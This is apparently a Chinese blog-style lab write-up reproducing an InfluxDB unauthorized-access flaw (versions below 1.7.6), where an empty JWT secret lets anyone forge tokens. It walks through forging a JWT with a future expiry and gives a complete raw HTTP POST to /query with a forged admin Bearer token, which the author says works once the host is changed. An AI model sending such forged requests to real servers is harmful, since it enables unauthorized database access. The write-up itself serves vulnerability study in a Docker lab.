1.原理
参考:https://blog.csdn.net/tqlisno1/article/details/109110644
InfluxDB 未授权访问 漏洞复现_influxdb未授权访问复现-CSDN博客
InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但未设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。
影响:InfluxDB < 1.7.6
2.复现
使用docker镜像
访问页面看配置
访问/query,显示需要登录
由于influxdb输入信息使用jwt的验证方式生成令牌,在令牌中放入时间戳表示令牌的过期时间,本漏洞的产生原因是在生成jwt的时候该influxdb没有设置加密秘钥,我们直接生成一个用户
生成jwt https://jwt.io/
时间戳生成
时间戳(Unix timestamp)转换工具 - 在线工具
所以我们需要一个username和exp,exp填入的时间戳是一个未来的
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IkpvaG4gRG9lIiwiZXhwIjoxNzIwNzAyNDQ2fQ.lao5PXaq14nU1C9InPZt7F-P0dxxLpcnc11C1nnbJkg
取消登录后发现出现这个页面,待会使用`Authorization: Bearer`方式提交我们的jwt,这 是一个 HTTP 头部字段,用于在客户端和服务器之间传输访问令牌(access token)。这种授权机制通常用于OAuth 2.0框架中,允许第三方应用访问用户在服务提供者上存储的受保护的资源。
抓包:
POST /query HTTP/1.1//改成post
Host: 192.168.61.10:8086
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzIwNzAyNDQ2fQ.kG23zjGNfMLfa8DLOxINHFqdEpEm5MQ5yRF85uzhodQ
Content-Length: 26
Content-Type:application/x-www-form-urlencoded//用post方式记得加上这条db=sample&q=show+users//显示返回值我出现的问题是返回错误值p,记得加上content-type,数据包内容我放在这了,改一下host就可以用了,修改q的值可以返回信息或者:
可以直接连接数据库,但是需要下载influxdb-client,我的kali突然下不了了,我就不做了,参考里面有
当然,记得做完要关闭容器
